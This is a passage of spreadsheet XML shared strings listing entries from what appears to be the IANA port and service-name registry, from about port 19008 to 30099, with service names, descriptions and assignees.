    <t>[Veejansh_Inc]</t>
  </si>
  <si>
    <t>[Chirag_Patel]</t>
  </si>
  <si>
    <t>19008-19019</t>
  </si>
  <si>
    <t>j-link</t>
  </si>
  <si>
    <t>J-Link TCP/IP Protocol</t>
  </si>
  <si>
    <t>[SEGGER]</t>
  </si>
  <si>
    <t>19021-19190</t>
  </si>
  <si>
    <t>opsec-uaa</t>
  </si>
  <si>
    <t>OPSEC UAA</t>
  </si>
  <si>
    <t>[Reuven_Harrison]</t>
  </si>
  <si>
    <t>19192-19193</t>
  </si>
  <si>
    <t>ua-secureagent</t>
  </si>
  <si>
    <t>UserAuthority SecureAgent</t>
  </si>
  <si>
    <t>[Reuven_Harrison_2]</t>
  </si>
  <si>
    <t>19195-19219</t>
  </si>
  <si>
    <t>cora</t>
  </si>
  <si>
    <t>Client Connection Management and Data Exchange Service</t>
  </si>
  <si>
    <t>[Softvise_GmbH]</t>
  </si>
  <si>
    <t>[Ronny_KrÃ¼ger]</t>
  </si>
  <si>
    <t>cora-disc</t>
  </si>
  <si>
    <t>Discovery for Client Connection Management and Data Exchange Service</t>
  </si>
  <si>
    <t>19221-19282</t>
  </si>
  <si>
    <t>keysrvr</t>
  </si>
  <si>
    <t>Key Server for SASSAFRAS</t>
  </si>
  <si>
    <t>[Mark_Valence]</t>
  </si>
  <si>
    <t>19284-19314</t>
  </si>
  <si>
    <t>keyshadow</t>
  </si>
  <si>
    <t>Key Shadow for SASSAFRAS</t>
  </si>
  <si>
    <t>19316-19397</t>
  </si>
  <si>
    <t>mtrgtrans</t>
  </si>
  <si>
    <t>[Katsuhito_Muroi]</t>
  </si>
  <si>
    <t>19399-19409</t>
  </si>
  <si>
    <t>hp-sco</t>
  </si>
  <si>
    <t>[Larry_Schwartz]</t>
  </si>
  <si>
    <t>hp-sca</t>
  </si>
  <si>
    <t>hp-sessmon</t>
  </si>
  <si>
    <t>HP-SESSMON</t>
  </si>
  <si>
    <t>[Gita_Murthy]</t>
  </si>
  <si>
    <t>19413-19538</t>
  </si>
  <si>
    <t>fxuptp</t>
  </si>
  <si>
    <t>FXUPTP</t>
  </si>
  <si>
    <t>[Keiji_Okuma]</t>
  </si>
  <si>
    <t>sxuptp</t>
  </si>
  <si>
    <t>SXUPTP</t>
  </si>
  <si>
    <t>jcp</t>
  </si>
  <si>
    <t>JCP Client</t>
  </si>
  <si>
    <t>[Yuji_Sasaki]</t>
  </si>
  <si>
    <t>19542-19787</t>
  </si>
  <si>
    <t>mle</t>
  </si>
  <si>
    <t>Mesh Link Establishment</t>
  </si>
  <si>
    <t>19789-19997</t>
  </si>
  <si>
    <t>iec-104-sec</t>
  </si>
  <si>
    <t>IEC 60870-5-104 process control - secure</t>
  </si>
  <si>
    <t>[Grant_Gilchrist]</t>
  </si>
  <si>
    <t>dnp-sec</t>
  </si>
  <si>
    <t>Distributed Network Protocol - Secure</t>
  </si>
  <si>
    <t>dnp</t>
  </si>
  <si>
    <t>DNP</t>
  </si>
  <si>
    <t>[Michael_Thesing]</t>
  </si>
  <si>
    <t>microsan</t>
  </si>
  <si>
    <t>MicroSAN</t>
  </si>
  <si>
    <t>[Thomas_E_Ludwig]</t>
  </si>
  <si>
    <t>commtact-http</t>
  </si>
  <si>
    <t>Commtact HTTP</t>
  </si>
  <si>
    <t>[Tomas_Svoboda]</t>
  </si>
  <si>
    <t>commtact-https</t>
  </si>
  <si>
    <t>Commtact HTTPS</t>
  </si>
  <si>
    <t>openwebnet</t>
  </si>
  <si>
    <t>OpenWebNet protocol for electric network</t>
  </si>
  <si>
    <t>[BTicino_S_p_A]</t>
  </si>
  <si>
    <t>20006-20011</t>
  </si>
  <si>
    <t>ss-idi-disc</t>
  </si>
  <si>
    <t>Samsung Interdevice Interaction discovery</t>
  </si>
  <si>
    <t>[Hong_Jungkih]</t>
  </si>
  <si>
    <t>ss-idi</t>
  </si>
  <si>
    <t>Samsung Interdevice Interaction</t>
  </si>
  <si>
    <t>opendeploy</t>
  </si>
  <si>
    <t>OpenDeploy Listener</t>
  </si>
  <si>
    <t>[Todd_Scallan]</t>
  </si>
  <si>
    <t>20015-20033</t>
  </si>
  <si>
    <t>nburn-id</t>
  </si>
  <si>
    <t>NetBurner ID Port
IANA assigned this well-formed service name as a replacement for "nburn_id".</t>
  </si>
  <si>
    <t>[Paul_Breed]</t>
  </si>
  <si>
    <t>nburn_id</t>
  </si>
  <si>
    <t>NetBurner ID Port</t>
  </si>
  <si>
    <t>This entry is an alias to "nburn-id".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>20035-20045</t>
  </si>
  <si>
    <t>tmophl7mts</t>
  </si>
  <si>
    <t>TMOP HL7 Message Transfer Service</t>
  </si>
  <si>
    <t>[Tim_Riley]</t>
  </si>
  <si>
    <t>20047-20047</t>
  </si>
  <si>
    <t>mountd</t>
  </si>
  <si>
    <t>NFS mount protocol</t>
  </si>
  <si>
    <t>[Nicolas_Williams]</t>
  </si>
  <si>
    <t>nfsrdma</t>
  </si>
  <si>
    <t>Network File System (NFS) over RDMA</t>
  </si>
  <si>
    <t>[RFC8267]</t>
  </si>
  <si>
    <t>20050-20056</t>
  </si>
  <si>
    <t>avesterra</t>
  </si>
  <si>
    <t>AvesTerra Hypergraph Transfer Protocol (HGTP)</t>
  </si>
  <si>
    <t>[Georgetown_University]</t>
  </si>
  <si>
    <t>[J.C._Smart]</t>
  </si>
  <si>
    <t>20058-20166</t>
  </si>
  <si>
    <t>tolfab</t>
  </si>
  <si>
    <t>TOLfab Data Change</t>
  </si>
  <si>
    <t>[Pierre_Couderc]</t>
  </si>
  <si>
    <t>20168-20201</t>
  </si>
  <si>
    <t>ipdtp-port</t>
  </si>
  <si>
    <t>IPD Tunneling Port</t>
  </si>
  <si>
    <t>[Vikki_Yin_Wei]</t>
  </si>
  <si>
    <t>20203-20221</t>
  </si>
  <si>
    <t>ipulse-ics</t>
  </si>
  <si>
    <t>iPulse-ICS</t>
  </si>
  <si>
    <t>[Meggie_Garica_Woodru]</t>
  </si>
  <si>
    <t>20223-20479</t>
  </si>
  <si>
    <t>emwavemsg</t>
  </si>
  <si>
    <t>emWave Message Service</t>
  </si>
  <si>
    <t>[Harald_Striepe]</t>
  </si>
  <si>
    <t>20481-20669</t>
  </si>
  <si>
    <t>track</t>
  </si>
  <si>
    <t>Track</t>
  </si>
  <si>
    <t>[Michael_Sweet]</t>
  </si>
  <si>
    <t>20671-20998</t>
  </si>
  <si>
    <t>athand-mmp</t>
  </si>
  <si>
    <t>At Hand MMP</t>
  </si>
  <si>
    <t>[Stepan_Riha]</t>
  </si>
  <si>
    <t>AT Hand MMP</t>
  </si>
  <si>
    <t>irtrans</t>
  </si>
  <si>
    <t>IRTrans Control</t>
  </si>
  <si>
    <t>[Marcus_Mueller]</t>
  </si>
  <si>
    <t>21001-21009</t>
  </si>
  <si>
    <t>notezilla-lan</t>
  </si>
  <si>
    <t>Notezilla.Lan Server</t>
  </si>
  <si>
    <t>[Conceptworld_Corporation]</t>
  </si>
  <si>
    <t>[Gautam_Jain]</t>
  </si>
  <si>
    <t>21011-21211</t>
  </si>
  <si>
    <t>trinket-agent</t>
  </si>
  <si>
    <t>Distributed artificial intelligence</t>
  </si>
  <si>
    <t>[Holvonix_LLC]</t>
  </si>
  <si>
    <t>[Advay_Mengle]</t>
  </si>
  <si>
    <t>cohesity-agent</t>
  </si>
  <si>
    <t>Cohesity backup agents</t>
  </si>
  <si>
    <t>[Cohesity_Inc]</t>
  </si>
  <si>
    <t>[Sashi_Madduri]</t>
  </si>
  <si>
    <t>21214-21220</t>
  </si>
  <si>
    <t>aigairserver</t>
  </si>
  <si>
    <t>Services for Air Server</t>
  </si>
  <si>
    <t>[AIG_S.L.]</t>
  </si>
  <si>
    <t>[Edelmiro_Gonzalez_Martinez]</t>
  </si>
  <si>
    <t>21222-21552</t>
  </si>
  <si>
    <t>rdm-tfs</t>
  </si>
  <si>
    <t>Raima RDM TFS</t>
  </si>
  <si>
    <t>[Paul_Johnson]</t>
  </si>
  <si>
    <t>dfserver</t>
  </si>
  <si>
    <t>MineScape Design File Server</t>
  </si>
  <si>
    <t>[Michael_Purser]</t>
  </si>
  <si>
    <t>21555-21589</t>
  </si>
  <si>
    <t>vofr-gateway</t>
  </si>
  <si>
    <t>VoFR Gateway</t>
  </si>
  <si>
    <t>[Marty_Borden]</t>
  </si>
  <si>
    <t>21591-21799</t>
  </si>
  <si>
    <t>tvpm</t>
  </si>
  <si>
    <t>TVNC Pro Multiplexing</t>
  </si>
  <si>
    <t>[Brian_Blevins]</t>
  </si>
  <si>
    <t>21801-21844</t>
  </si>
  <si>
    <t>webphone</t>
  </si>
  <si>
    <t>[Toby_Hosterman]</t>
  </si>
  <si>
    <t>netspeak-is</t>
  </si>
  <si>
    <t>NetSpeak Corp. Directory Services</t>
  </si>
  <si>
    <t>netspeak-cs</t>
  </si>
  <si>
    <t>NetSpeak Corp. Connection Services</t>
  </si>
  <si>
    <t>netspeak-acd</t>
  </si>
  <si>
    <t>NetSpeak Corp. Automatic Call Distribution</t>
  </si>
  <si>
    <t>netspeak-cps</t>
  </si>
  <si>
    <t>NetSpeak Corp. Credit Processing System</t>
  </si>
  <si>
    <t>21850-21999</t>
  </si>
  <si>
    <t>snapenetio</t>
  </si>
  <si>
    <t>SNAPenetIO</t>
  </si>
  <si>
    <t>[Kevin_Kuhns]</t>
  </si>
  <si>
    <t>optocontrol</t>
  </si>
  <si>
    <t>OptoControl</t>
  </si>
  <si>
    <t>optohost002</t>
  </si>
  <si>
    <t>Opto Host Port 2</t>
  </si>
  <si>
    <t>[Doug_Leany]</t>
  </si>
  <si>
    <t>optohost003</t>
  </si>
  <si>
    <t>Opto Host Port 3</t>
  </si>
  <si>
    <t>optohost004</t>
  </si>
  <si>
    <t>Opto Host Port 4</t>
  </si>
  <si>
    <t>Opto Host Port 5</t>
  </si>
  <si>
    <t>22006-22124</t>
  </si>
  <si>
    <t>dcap</t>
  </si>
  <si>
    <t>dCache Access Protocol</t>
  </si>
  <si>
    <t>22126-22127</t>
  </si>
  <si>
    <t>gsidcap</t>
  </si>
  <si>
    <t>GSI dCache Access Protocol</t>
  </si>
  <si>
    <t>22129-22221</t>
  </si>
  <si>
    <t>easyengine</t>
  </si>
  <si>
    <t>EasyEngine is CLI tool to manage WordPress Sites on Nginx server</t>
  </si>
  <si>
    <t>[rtCamp_Solutions_Private_Limited]</t>
  </si>
  <si>
    <t>[Rahul_Bansal]</t>
  </si>
  <si>
    <t>22223-22272</t>
  </si>
  <si>
    <t>wnn6</t>
  </si>
  <si>
    <t>22274-22304</t>
  </si>
  <si>
    <t>cis</t>
  </si>
  <si>
    <t>CompactIS Tunnel</t>
  </si>
  <si>
    <t>[Justin_Paupore]</t>
  </si>
  <si>
    <t>22306-22334</t>
  </si>
  <si>
    <t>shrewd-control</t>
  </si>
  <si>
    <t>Initium Labs Security and Automation Control</t>
  </si>
  <si>
    <t>[Initium_Labs_LLC]</t>
  </si>
  <si>
    <t>[Manbir_Sahni]</t>
  </si>
  <si>
    <t>shrewd-stream</t>
  </si>
  <si>
    <t>Initium Labs Security and Automation Streaming</t>
  </si>
  <si>
    <t>22336-22342</t>
  </si>
  <si>
    <t>cis-secure</t>
  </si>
  <si>
    <t>CompactIS Secure Tunnel</t>
  </si>
  <si>
    <t>22344-22346</t>
  </si>
  <si>
    <t>wibukey</t>
  </si>
  <si>
    <t>WibuKey Standard WkLan</t>
  </si>
  <si>
    <t>[Wolfgang_Voelker]</t>
  </si>
  <si>
    <t>22348-22349</t>
  </si>
  <si>
    <t>codemeter</t>
  </si>
  <si>
    <t>CodeMeter Standard</t>
  </si>
  <si>
    <t>codemeter-cmwan</t>
  </si>
  <si>
    <t>TPC/IP requests of copy protection software to a server</t>
  </si>
  <si>
    <t>[WIBU-SYSTEMS_AG]</t>
  </si>
  <si>
    <t>[Wolfgang_VÃ¶lker_2]</t>
  </si>
  <si>
    <t>22352-22536</t>
  </si>
  <si>
    <t>caldsoft-backup</t>
  </si>
  <si>
    <t>CaldSoft Backup server file transfer</t>
  </si>
  <si>
    <t>[CaldSoft]</t>
  </si>
  <si>
    <t>[Mark_Caldwell]</t>
  </si>
  <si>
    <t>22538-22554</t>
  </si>
  <si>
    <t>vocaltec-wconf</t>
  </si>
  <si>
    <t>Vocaltec Web Conference</t>
  </si>
  <si>
    <t>vocaltec-phone</t>
  </si>
  <si>
    <t>Vocaltec Internet Phone</t>
  </si>
  <si>
    <t>22556-22762</t>
  </si>
  <si>
    <t>talikaserver</t>
  </si>
  <si>
    <t>Talika Main Server</t>
  </si>
  <si>
    <t>[Laxman_C_Marathe]</t>
  </si>
  <si>
    <t>22764-22799</t>
  </si>
  <si>
    <t>aws-brf</t>
  </si>
  <si>
    <t>Telerate Information Platform LAN</t>
  </si>
  <si>
    <t>22801-22950</t>
  </si>
  <si>
    <t>brf-gw</t>
  </si>
  <si>
    <t>Telerate Information Platform WAN</t>
  </si>
  <si>
    <t>22952-22999</t>
  </si>
  <si>
    <t>inovaport1</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 1</t>
  </si>
  <si>
    <t>[Chris_Koeritz_3]</t>
  </si>
  <si>
    <t>inovaport2</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 2</t>
  </si>
  <si>
    <t>inovaport3</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 3</t>
  </si>
  <si>
    <t>inovaport4</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 4</t>
  </si>
  <si>
    <t>inovaport5</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 5</t>
  </si>
  <si>
    <t>inovaport6</t>
  </si>
  <si>
    <t>Inova LightLink Server Type 6</t>
  </si>
  <si>
    <t>23006-23052</t>
  </si>
  <si>
    <t>gntp</t>
  </si>
  <si>
    <t>Generic Notification Transport Protocol</t>
  </si>
  <si>
    <t>[Growl_Project]</t>
  </si>
  <si>
    <t>[Chris_Forsythe]</t>
  </si>
  <si>
    <t>23054-23271</t>
  </si>
  <si>
    <t>s102</t>
  </si>
  <si>
    <t>S102 application</t>
  </si>
  <si>
    <t>23273-23293</t>
  </si>
  <si>
    <t>5afe-dir</t>
  </si>
  <si>
    <t>5AFE SDN Directory</t>
  </si>
  <si>
    <t>[Ayoda_GmbH]</t>
  </si>
  <si>
    <t>[Laurenz_Eschwey]</t>
  </si>
  <si>
    <t>5afe-disc</t>
  </si>
  <si>
    <t>5AFE SDN Directory discovery</t>
  </si>
  <si>
    <t>23295-23332</t>
  </si>
  <si>
    <t>elxmgmt</t>
  </si>
  <si>
    <t>Emulex HBAnyware Remote Management</t>
  </si>
  <si>
    <t>[Maziar_Tamadon]</t>
  </si>
  <si>
    <t>23334-23399</t>
  </si>
  <si>
    <t>novar-dbase</t>
  </si>
  <si>
    <t>Novar Data</t>
  </si>
  <si>
    <t>[Keith_Kilroy]</t>
  </si>
  <si>
    <t>novar-alarm</t>
  </si>
  <si>
    <t>Novar Alarm</t>
  </si>
  <si>
    <t>novar-global</t>
  </si>
  <si>
    <t>Novar Global</t>
  </si>
  <si>
    <t>23403-23455</t>
  </si>
  <si>
    <t>aequus</t>
  </si>
  <si>
    <t>Aequus Service</t>
  </si>
  <si>
    <t>[James_Anson]</t>
  </si>
  <si>
    <t>aequus-alt</t>
  </si>
  <si>
    <t>Aequus Service Mgmt</t>
  </si>
  <si>
    <t>23458-23545</t>
  </si>
  <si>
    <t>areaguard-neo</t>
  </si>
  <si>
    <t>AreaGuard Neo - WebServer</t>
  </si>
  <si>
    <t>[SODATSW_spol]</t>
  </si>
  <si>
    <t>[Roman_Å tÄ›pÃ¡nek]</t>
  </si>
  <si>
    <t>23547-23999</t>
  </si>
  <si>
    <t>med-ltp</t>
  </si>
  <si>
    <t>[Juergen_Fischbach]</t>
  </si>
  <si>
    <t>med-fsp-rx</t>
  </si>
  <si>
    <t>med-fsp-tx</t>
  </si>
  <si>
    <t>med-supp</t>
  </si>
  <si>
    <t>med-ovw</t>
  </si>
  <si>
    <t>med-ci</t>
  </si>
  <si>
    <t>med-net-svc</t>
  </si>
  <si>
    <t>24007-24241</t>
  </si>
  <si>
    <t>filesphere</t>
  </si>
  <si>
    <t>fileSphere</t>
  </si>
  <si>
    <t>[Carl_Cedergren]</t>
  </si>
  <si>
    <t>24243-24248</t>
  </si>
  <si>
    <t>vista-4gl</t>
  </si>
  <si>
    <t>Vista 4GL</t>
  </si>
  <si>
    <t>[Mark_Itzcovitz]</t>
  </si>
  <si>
    <t>24250-24320</t>
  </si>
  <si>
    <t>ild</t>
  </si>
  <si>
    <t>Isolv Local Directory</t>
  </si>
  <si>
    <t>[Mitchell_Bass]</t>
  </si>
  <si>
    <t>hid</t>
  </si>
  <si>
    <t>Transport of Human Interface Device data streams</t>
  </si>
  <si>
    <t>[Freebox_SAS]</t>
  </si>
  <si>
    <t>[Nicolas_Pouillon]</t>
  </si>
  <si>
    <t>vrmg-ip</t>
  </si>
  <si>
    <t>Verimag mobile class protocol over TCP</t>
  </si>
  <si>
    <t>[Verimag_OOO]</t>
  </si>
  <si>
    <t>[Denis_Ionov]</t>
  </si>
  <si>
    <t>24324-24385</t>
  </si>
  <si>
    <t>intel-rci</t>
  </si>
  <si>
    <t>Intel RCI
IANA assigned this well-formed service name as a replacement for "intel_rci".</t>
  </si>
  <si>
    <t>[Mark_Lewis_2]</t>
  </si>
  <si>
    <t>intel_rci</t>
  </si>
  <si>
    <t>Intel RCI</t>
  </si>
  <si>
    <t>This entry is an alias to "intel-rci".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>24387-24464</t>
  </si>
  <si>
    <t>tonidods</t>
  </si>
  <si>
    <t>Tonido Domain Server</t>
  </si>
  <si>
    <t>[Madhan_Kanagavel]</t>
  </si>
  <si>
    <t>24466-24553</t>
  </si>
  <si>
    <t>binkp</t>
  </si>
  <si>
    <t>BINKP</t>
  </si>
  <si>
    <t>[Maxim_Masiutin]</t>
  </si>
  <si>
    <t>24555-24576</t>
  </si>
  <si>
    <t>bilobit</t>
  </si>
  <si>
    <t>bilobit Service</t>
  </si>
  <si>
    <t>[bilobit_GmbH]</t>
  </si>
  <si>
    <t>[Martin_Schmuker]</t>
  </si>
  <si>
    <t>bilobit-update</t>
  </si>
  <si>
    <t>bilobit Service Update</t>
  </si>
  <si>
    <t>24578-24665</t>
  </si>
  <si>
    <t>sdtvwcam</t>
  </si>
  <si>
    <t>Service used by SmarDTV to communicate between a CAM and a second screen application</t>
  </si>
  <si>
    <t>[SmarDTV]</t>
  </si>
  <si>
    <t>[Vincent_Demortier]</t>
  </si>
  <si>
    <t>24667-24675</t>
  </si>
  <si>
    <t>canditv</t>
  </si>
  <si>
    <t>Canditv Message Service</t>
  </si>
  <si>
    <t>[Gary_Aston]</t>
  </si>
  <si>
    <t>flashfiler</t>
  </si>
  <si>
    <t>FlashFiler</t>
  </si>
  <si>
    <t>[Ben_Oram]</t>
  </si>
  <si>
    <t>proactivate</t>
  </si>
  <si>
    <t>Turbopower Proactivate</t>
  </si>
  <si>
    <t>tcc-http</t>
  </si>
  <si>
    <t>TCC User HTTP Service</t>
  </si>
  <si>
    <t>[Brian_Kennedy]</t>
  </si>
  <si>
    <t>24681-24753</t>
  </si>
  <si>
    <t>cslg</t>
  </si>
  <si>
    <t>Citrix StorageLink Gateway</t>
  </si>
  <si>
    <t>[Mark_Nijmeijer]</t>
  </si>
  <si>
    <t>24755-24849</t>
  </si>
  <si>
    <t>assoc-disc</t>
  </si>
  <si>
    <t>Device Association Discovery</t>
  </si>
  <si>
    <t>[Microsoft_Corporation_3]</t>
  </si>
  <si>
    <t>[Sachin_Sheth]</t>
  </si>
  <si>
    <t>24851-24921</t>
  </si>
  <si>
    <t>find</t>
  </si>
  <si>
    <t>Find Identification of Network Devices</t>
  </si>
  <si>
    <t>[Jean_Paul_Moreaux]</t>
  </si>
  <si>
    <t>24923-24999</t>
  </si>
  <si>
    <t>icl-twobase1</t>
  </si>
  <si>
    <t>[J_A_Sever]</t>
  </si>
  <si>
    <t>icl-twobase2</t>
  </si>
  <si>
    <t>icl-twobase3</t>
  </si>
  <si>
    <t>icl-twobase4</t>
  </si>
  <si>
    <t>icl-twobase5</t>
  </si>
  <si>
    <t>icl-twobase6</t>
  </si>
  <si>
    <t>icl-twobase7</t>
  </si>
  <si>
    <t>icl-twobase8</t>
  </si>
  <si>
    <t>icl-twobase9</t>
  </si>
  <si>
    <t>icl-twobase10</t>
  </si>
  <si>
    <t>25010-25470</t>
  </si>
  <si>
    <t>rna</t>
  </si>
  <si>
    <t>RNSAP User Adaptation for Iurh</t>
  </si>
  <si>
    <t>[Dario_S_Tonesi]</t>
  </si>
  <si>
    <t>25472-25575</t>
  </si>
  <si>
    <t>sauterdongle</t>
  </si>
  <si>
    <t>Sauter Dongle</t>
  </si>
  <si>
    <t>[Christian_Brecht]</t>
  </si>
  <si>
    <t>25577-25603</t>
  </si>
  <si>
    <t>idtp</t>
  </si>
  <si>
    <t>Identifier Tracing Protocol</t>
  </si>
  <si>
    <t>[Huang_Neng-geng]</t>
  </si>
  <si>
    <t>25605-25792</t>
  </si>
  <si>
    <t>vocaltec-hos</t>
  </si>
  <si>
    <t>Vocaltec Address Server</t>
  </si>
  <si>
    <t>25794-25899</t>
  </si>
  <si>
    <t>tasp-net</t>
  </si>
  <si>
    <t>TASP Network Comm</t>
  </si>
  <si>
    <t>[Martin_Ellis]</t>
  </si>
  <si>
    <t>niobserver</t>
  </si>
  <si>
    <t>NIObserver</t>
  </si>
  <si>
    <t>[Roman_Oliynyk]</t>
  </si>
  <si>
    <t>nilinkanalyst</t>
  </si>
  <si>
    <t>NILinkAnalyst</t>
  </si>
  <si>
    <t>[Roman_Oliynyk_2]</t>
  </si>
  <si>
    <t>niprobe</t>
  </si>
  <si>
    <t>NIProbe</t>
  </si>
  <si>
    <t>25904-25953</t>
  </si>
  <si>
    <t>bf-game</t>
  </si>
  <si>
    <t>Bitfighter game server</t>
  </si>
  <si>
    <t>[Christopher_Eykamp]</t>
  </si>
  <si>
    <t>bf-master</t>
  </si>
  <si>
    <t>Bitfighter master server</t>
  </si>
  <si>
    <t>25956-25999</t>
  </si>
  <si>
    <t>quake</t>
  </si>
  <si>
    <t>26001-26132</t>
  </si>
  <si>
    <t>scscp</t>
  </si>
  <si>
    <t>Symbolic Computation Software Composability Protocol</t>
  </si>
  <si>
    <t>[Alexander_Konovalov]</t>
  </si>
  <si>
    <t>26134-26207</t>
  </si>
  <si>
    <t>wnn6-ds</t>
  </si>
  <si>
    <t>26209-26256</t>
  </si>
  <si>
    <t>cockroach</t>
  </si>
  <si>
    <t>CockroachDB</t>
  </si>
  <si>
    <t>[Cockroach_Labs_Inc]</t>
  </si>
  <si>
    <t>[Ben_Darnell]</t>
  </si>
  <si>
    <t>26258-26259</t>
  </si>
  <si>
    <t>ezproxy</t>
  </si>
  <si>
    <t>ezmeeting</t>
  </si>
  <si>
    <t>k3software-svr</t>
  </si>
  <si>
    <t>K3 Software-Server</t>
  </si>
  <si>
    <t>[Jim_Baldridge]</t>
  </si>
  <si>
    <t>k3software-cli</t>
  </si>
  <si>
    <t>K3 Software-Client</t>
  </si>
  <si>
    <t>26265-26485</t>
  </si>
  <si>
    <t>exoline-tcp</t>
  </si>
  <si>
    <t>EXOline-TCP</t>
  </si>
  <si>
    <t>[AB_Regin]</t>
  </si>
  <si>
    <t>[Simon_Jonsson]</t>
  </si>
  <si>
    <t>exoline-udp</t>
  </si>
  <si>
    <t>EXOline-UDP</t>
  </si>
  <si>
    <t>exoconfig</t>
  </si>
  <si>
    <t>EXOconfig</t>
  </si>
  <si>
    <t>[Urban_Fosseus]</t>
  </si>
  <si>
    <t>exonet</t>
  </si>
  <si>
    <t>EXOnet</t>
  </si>
  <si>
    <t>26490-26999</t>
  </si>
  <si>
    <t>flex-lm</t>
  </si>
  <si>
    <t>27000-27009</t>
  </si>
  <si>
    <t>FLEX LM (1-10)</t>
  </si>
  <si>
    <t>[Flexera_Software]</t>
  </si>
  <si>
    <t>[Paul_Bland]</t>
  </si>
  <si>
    <t>flex-lmadmin</t>
  </si>
  <si>
    <t>A protocol for managing license services</t>
  </si>
  <si>
    <t>[Flexera]</t>
  </si>
  <si>
    <t>27011-27016</t>
  </si>
  <si>
    <t>mongodb</t>
  </si>
  <si>
    <t>Mongo database system</t>
  </si>
  <si>
    <t>[MongoDB_Inc.]</t>
  </si>
  <si>
    <t>[Akshay_Kumar]</t>
  </si>
  <si>
    <t>27018-27344</t>
  </si>
  <si>
    <t>Unauthorized Use Known on ports 27018 and 27019</t>
  </si>
  <si>
    <t>imagepump</t>
  </si>
  <si>
    <t>ImagePump</t>
  </si>
  <si>
    <t>[Richard_Minner]</t>
  </si>
  <si>
    <t>27346-27441</t>
  </si>
  <si>
    <t>jesmsjc</t>
  </si>
  <si>
    <t>Job controller service</t>
  </si>
  <si>
    <t>27443-27503</t>
  </si>
  <si>
    <t>kopek-httphead</t>
  </si>
  <si>
    <t>Kopek HTTP Head Port</t>
  </si>
  <si>
    <t>[Sten_H_Danielsen]</t>
  </si>
  <si>
    <t>27505-27781</t>
  </si>
  <si>
    <t>ars-vista</t>
  </si>
  <si>
    <t>ARS VISTA Application</t>
  </si>
  <si>
    <t>[Spencer_Teran_2]</t>
  </si>
  <si>
    <t>27783-27875</t>
  </si>
  <si>
    <t>astrolink</t>
  </si>
  <si>
    <t>Astrolink Protocol</t>
  </si>
  <si>
    <t>[Alanax_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Wesley_Eddy]</t>
  </si>
  <si>
    <t>27877-27998</t>
  </si>
  <si>
    <t>tw-auth-key</t>
  </si>
  <si>
    <t>TW Authentication/Key Distribution and</t>
  </si>
  <si>
    <t>[Alex_Duncan_2]</t>
  </si>
  <si>
    <t>Attribute Certificate Services</t>
  </si>
  <si>
    <t>nxlmd</t>
  </si>
  <si>
    <t>NX License Manager</t>
  </si>
  <si>
    <t>[Anthony_Greatorex]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 28000</t>
  </si>
  <si>
    <t>pqsp</t>
  </si>
  <si>
    <t>PQ Service</t>
  </si>
  <si>
    <t>[Peter_Laschtowitz]</t>
  </si>
  <si>
    <t>28002-28009</t>
  </si>
  <si>
    <t>gruber-cashreg</t>
  </si>
  <si>
    <t>Gruber cash registry protocol</t>
  </si>
  <si>
    <t>[Gruber_Schanksysteme]</t>
  </si>
  <si>
    <t>[Clemens_Gruber]</t>
  </si>
  <si>
    <t>28011-28118</t>
  </si>
  <si>
    <t>Unauthorized Use Known on ports 28017, 28018 and 28019</t>
  </si>
  <si>
    <t>a27-ran-ran</t>
  </si>
  <si>
    <t>A27 cdma2000 RAN Management</t>
  </si>
  <si>
    <t>28120-28199</t>
  </si>
  <si>
    <t>voxelstorm</t>
  </si>
  <si>
    <t>VoxelStorm game server</t>
  </si>
  <si>
    <t>[VoxelStorm]</t>
  </si>
  <si>
    <t>[Eugene_Hopkinson]</t>
  </si>
  <si>
    <t>28201-28239</t>
  </si>
  <si>
    <t>siemensgsm</t>
  </si>
  <si>
    <t>Siemens GSM</t>
  </si>
  <si>
    <t>[David_Anuszewski]</t>
  </si>
  <si>
    <t>28241-28588</t>
  </si>
  <si>
    <t>bosswave</t>
  </si>
  <si>
    <t>Building operating system services wide area verified exchange</t>
  </si>
  <si>
    <t>[University_of_California_Berkeley]</t>
  </si>
  <si>
    <t>[Michael_Andersen]</t>
  </si>
  <si>
    <t>28590-28999</t>
  </si>
  <si>
    <t>saltd-licensing</t>
  </si>
  <si>
    <t>Siemens Licensing Server</t>
  </si>
  <si>
    <t>[Siemens_Digital_Industries_Software]</t>
  </si>
  <si>
    <t>[Tony_Greatorex]</t>
  </si>
  <si>
    <t>29001-29117</t>
  </si>
  <si>
    <t>sgsap</t>
  </si>
  <si>
    <t>SGsAP in 3GPP</t>
  </si>
  <si>
    <t>[GPP_Specifications]</t>
  </si>
  <si>
    <t>29119-29166</t>
  </si>
  <si>
    <t>otmp</t>
  </si>
  <si>
    <t>ObTools Message Protocol</t>
  </si>
  <si>
    <t>[Paul_Clark]</t>
  </si>
  <si>
    <t>sbcap</t>
  </si>
  <si>
    <t>SBcAP in 3GPP</t>
  </si>
  <si>
    <t>iuhsctpassoc</t>
  </si>
  <si>
    <t>HNBAP and RUA Common Association</t>
  </si>
  <si>
    <t>[John_Meredith]</t>
  </si>
  <si>
    <t>29170-29998</t>
  </si>
  <si>
    <t>bingbang</t>
  </si>
  <si>
    <t>data exchange protocol for IEC61850 in wind power plants</t>
  </si>
  <si>
    <t>[DEIF_AS]</t>
  </si>
  <si>
    <t>[Armin_Solies]</t>
  </si>
  <si>
    <t>ndmps</t>
  </si>
  <si>
    <t>Secure Network Data Management Protocol</t>
  </si>
  <si>
    <t>[Alioune_Thiam]</t>
  </si>
  <si>
    <t>pago-services1</t>
  </si>
  <si>
    <t>Pago Services 1</t>
  </si>
  <si>
    <t>[Balduin_Mueller_Plat]</t>
  </si>
  <si>
    <t>pago-services2</t>
  </si>
  <si>
    <t>Pago Services 2</t>
  </si>
  <si>
    <t>amicon-fpsu-ra</t>
  </si>
  <si>
    <t>Amicon FPSU-IP Remote Administration</t>
  </si>
  <si>
    <t>[Amicon_OOO]</t>
  </si>
  <si>
    <t>[Alexey_Novotorzhin]</t>
  </si>
  <si>
    <t>amicon-fpsu-s</t>
  </si>
  <si>
    <t>Amicon FPSU-IP VPN</t>
  </si>
  <si>
    <t>30005-30099</t>
  </si>
  <si>
    <t>rwp</t>
  </si>
  <si>
    <t>Remote Window Protocol</t>
  </si>
  <si>
